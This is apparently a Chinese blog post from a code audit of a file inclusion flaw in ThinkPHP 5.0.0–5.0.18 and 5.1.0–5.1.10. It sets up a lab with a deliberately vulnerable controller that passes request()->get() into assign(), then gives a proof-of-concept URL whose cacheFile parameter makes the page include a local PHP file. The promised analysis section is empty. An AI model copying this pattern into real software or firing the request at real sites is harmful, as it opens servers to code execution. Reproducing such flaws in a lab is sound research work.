Thinkphp5-文件包含

代码审计
创建时间:
阅读:
  1. 环境搭建
  2. 漏洞分析

漏洞影响版本: 5.0.0<=ThinkPHP5<=5.0.18 、5.1.0<=ThinkPHP<=5.1.10

环境搭建

composer

1
composer create-project --prefer-dist topthink/think=5.0.18 tpdemo

然后修改其中的composer.json,修改require:

1
2
3
4
"require": {
    "php": ">=5.6.0",
    "topthink/framework": "5.0.18"
},

然后更新

1
composer update

修改 application/index/controller/Index.php 文件

1
2
3
4
5
6
7
8
9
10
11
<?php
namespace app\index\controller;
use think\Controller;
class Index extends Controller
{
    public function index()
    {
        $this->assign(request()->get());
        return $this->fetch(); 
    }
}

创建 application/index/view/index/index.html ,内容啥都行,没有这个的话会报错,整了好久 ==

然后在public目录下新建一个test.php,内容:

1
2
3
<?php
	phpinfo();
?>

访问url: http://127.0.0.1/tpdemo5.0.18/public/?cacheFile=test.php

这样就好了,接下来我们分析跟踪漏洞的成因

漏洞分析

Lazy……

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 sher10cksec@foxmail.com

文章标题:Thinkphp5-文件包含

本文作者:sher10ck

发布时间:2019-11-21, 10:06:24

最后更新:2020-11-02, 23:19:32

原始链接:http://sherlocz.github.io/2019/11/21/Thinkphp5-文件包含/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

©2019-2020 sher10ck

Built with Hexo and 3-hexo theme

目录